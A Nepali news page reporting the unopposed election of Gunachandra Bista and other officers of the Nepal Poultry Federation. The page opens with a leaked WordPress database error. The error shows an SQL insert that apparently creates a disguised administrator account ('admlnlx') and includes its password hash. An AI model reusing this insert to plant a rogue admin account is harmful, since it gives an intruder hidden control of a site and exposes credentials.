WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BBVWjkWmSIYq6iRi4rNakWZyyWuaFY1', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-13 00:16:46', '', 'admlnlx', 'admlnlx')
चितवन,माघ ३-
नेपाल पोल्ट्री महासंघको अध्यक्षमा गुणचन्द्र विष्ट निर्विरोध चयन भएका छन्।महासंघको तेस्रो साधारणसभाबाट उनी निर्विरोध चयन भएका हुन्।२०६८ मा स्थापना भएको महासंघमा ५६ जना सदस्य छन्।
महासंघका उपाध्यक्षमा नारायणहरि खत्री,टिकाराम पोखरेल र अर्जुनकुमार अर्याल चयन भएका छन्।महासंघको महासचिव,सचिव र कोषाध्यक्षमा क्रमशः दिनेशराज मिश्र, शिवराम केसी र बाबुराजा रावल चयन भएका छन्।
महासंघको सदस्यहरुमा डा. रुपेन्द्र चौलागार्इँ,चन्द्रमान श्रेष्ठ,डा. तिलचन्द्र भट्टरार्इ,जंगबहादुर बेल्वासे,तेजनारायण पाण्डे,उमेशचन्द्र सापकोटा,सुरज वैद्य,राजेन्द्र लामिछाने,जयकृष्ण सापकोटा,रामलाल भुसाल,तरुण राजवन्त,कृष्णहरि लोहनी र रविन्द्रराज सिपखान चयन भएका छन्।
महासंघका नवनिर्वाचित अध्यक्ष विष्टले आत्मनिर्भरतातर्फ अगाडी बढेको पोल्ट्री क्षेत्रको विकासमा लाग्ने बताउँदै सरकारसँग सहकार्य गरेर नीतिगत सहजताको प्रयास गर्ने प्रतिवद्धता व्यक्त गरे।